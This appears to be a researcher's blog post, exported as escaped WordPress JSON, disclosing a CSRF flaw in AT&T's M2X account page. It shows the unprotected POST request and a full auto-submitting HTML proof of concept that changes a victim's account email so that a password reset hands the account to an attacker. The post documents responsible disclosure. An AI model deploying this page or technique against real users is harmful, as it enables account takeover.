This is the PoC i sent to AT&T<\/p>\n
I’ve found a CSRF bug that may lead to full takeover account of a M2X AT&T user account
\nThese are the steps to reproduce the issue:
\n1)Login into https:\/\/m2x.att.com\/login<\/p>\n
2)Once logged in we have to go to https:\/\/m2x.att.com\/account
\nIn this page we can see “First Name”,”Last Name”,”Email” forms.If we try to change the values of these forms and subsequently click
\non the “Save Changes” button a POST request like this will be generated with no anti-CSRF token:<\/p>\n
POST https:\/\/m2x.att.com\/account<\/p>\n
Host: m2x.att.com
\nUser-Agent: Mozilla\/5.0 (X11; Linux x86_64; rv:22.0) Gecko\/20100101 Firefox\/22.0 Iceweasel\/22.0
\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8
\nAccept-Language: en-US,en;q=0.5
\nAccept-Encoding: gzip, deflate
\nReferer: https:\/\/m2x.att.com\/account
\nCookie: mycookies
\nConnection: keep-alive
\nContent-Type: application\/x-www-form-urlencoded
\nContent-Length: 115<\/p>\n
first_name=marco1&last_name=cariddi&email=sangunazzu@gmail.com¤t_password=&password=&password_confirmation=<\/p>\n
There is no anti-CSRF token so it’s vulnerable to CSRF.So now i can create an ad-hoc HTML page like the following to set the value of the
\n“email” parameter with the email of the attacker.Once the victim has visited the HTML page,the new attacker’s email will be saved in the
\nvictim account and subsequently the attacker could make a Reset password at this page https:\/\/m2x.att.com\/forgot-password.
\nSo now an email will be sent to the attacker’s email and now the attacker can reset password of the victim’s account.<\/p>\n
This is the CSRF Final POC:<\/p>\n
<!DOCTYPE HTML PUBLIC “-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN”><\/p>\n
<html>
\n<head>
\n<title>How i\u00a0 Hacked AT&T<\/title>
\n<\/head><\/p>\n
<body onload=”javascript:fireForms()”>
\n<script language=”JavaScript”>
\nvar pauses = new Array( “1824” );<\/p>\n
function pausecomp(millis)
\n{
\nvar date = new Date();
\nvar curDate = null;<\/p>\n
do { curDate = new Date(); }
\nwhile(curDate-date < millis);
\n}<\/p>\n
function fireForms()
\n{
\nvar count = 1;
\nvar i=0;<\/p>\n
for(i=0; i<count; i++)
\n{
\ndocument.forms[i].submit();<\/p>\n
pausecomp(pauses[i]);
\n}
\n}<\/p>\n
<\/script>
\n<H2>How i\u00a0 Hacked AT&T<\/H2>
\n<form method=”POST” name=”form0″ action=”https:\/\/m2x.att.com:443\/account”>
\n<input type=”hidden” name=”first_name” value=”marco1″\/>
\n<input type=”hidden” name=”last_name” value=”cariddi”\/>
\n<input type=”hidden” name=”email” value=”sangunazzu@gmail.com”\/>
\n<input type=”hidden” name=”current_password” value=””\/>
\n<input type=”hidden” name=”password” value=””\/>
\n<input type=”hidden” name=”password_confirmation” value=””\/>
\n<\/form><\/p>\n
<\/body>
\n<\/html><\/p>\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
This is the PoC i sent to AT&T I’ve found a CSRF bug that may lead to full takeover account of a M2X AT&T user account These are the steps to reproduce the issue: 1)Login into https:\/\/m2x.att.com\/login<\/p>\n","protected":false},"author":2,"featured_media":9,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-129","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-uncategorized-en"],"yoast_head":"\n